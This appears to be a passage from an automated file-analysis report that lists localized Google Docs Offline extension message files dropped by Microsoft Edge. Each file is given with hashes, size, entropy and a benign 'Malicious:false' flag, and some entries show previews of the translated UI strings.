                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):939
                                Entropy (8bit):4.451724169062555
                                Encrypted:false
                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):977
                                Entropy (8bit):4.622066056638277
                                Encrypted:false
                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):972
                                Entropy (8bit):4.621319511196614
                                Encrypted:false
                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):990
                                Entropy (8bit):4.497202347098541
                                Encrypted:false
                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1658
                                Entropy (8bit):4.294833932445159
                                Encrypted:false
                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1672
                                Entropy (8bit):4.314484457325167
                                Encrypted:false
                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):935
                                Entropy (8bit):4.6369398601609735
                                Encrypted:false
                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1065
                                Entropy (8bit):4.816501737523951
                                Encrypted:false
                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2771
                                Entropy (8bit):3.7629875118570055
                                Encrypted:false
                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):858
                                Entropy (8bit):4.474411340525479
                                Encrypted:false
                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):954
                                Entropy (8bit):4.631887382471946
                                Encrypted:false
                                SSDEEP:12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
                                MD5:1F565FB1C549B18AF8BBFED8DECD5D94
                                SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
                                SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
                                SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
                                Malicious:false
                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):899
                                Entropy (8bit):4.474743599345443
                                Encrypted:false
                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2230
                                Entropy (8bit):3.8239097369647634
                                Encrypted:false
                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1160
                                Entropy (8bit):5.292894989863142
                                Encrypted:false
                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3264
                                Entropy (8bit):3.586016059431306
                                Encrypted:false
                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                MD5:83F81D30913DC4344573D7A58BD20D85
                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3235
                                Entropy (8bit):3.6081439490236464
                                Encrypted:false
                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3122
                                Entropy (8bit):3.891443295908904
                                Encrypted:false
                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1880
                                Entropy (8bit):4.295185867329351
                                Encrypted:false
                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
                                MD5:8E16966E815C3C274EEB8492B1EA6648
                                SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
                                SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
                                SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1042
                                Entropy (8bit):5.3945675025513955
                                Encrypted:false
                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                MD5:F3E59EEEB007144EA26306C20E04C292
                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2535
                                Entropy (8bit):3.8479764584971368
                                Encrypted:false
                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                MD5:E20D6C27840B406555E2F5091B118FC5
                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1028
                                Entropy (8bit):4.797571191712988
                                Encrypted:false
                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                MD5:970544AB4622701FFDF66DC556847652
                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):994
                                Entropy (8bit):4.700308832360794
                                Encrypted:false
                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                MD5:A568A58817375590007D1B8ABCAEBF82
                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2091
                                Entropy (8bit):4.358252286391144
                                Encrypted:false
                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2778
                                Entropy (8bit):3.595196082412897
                                Encrypted:false
                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
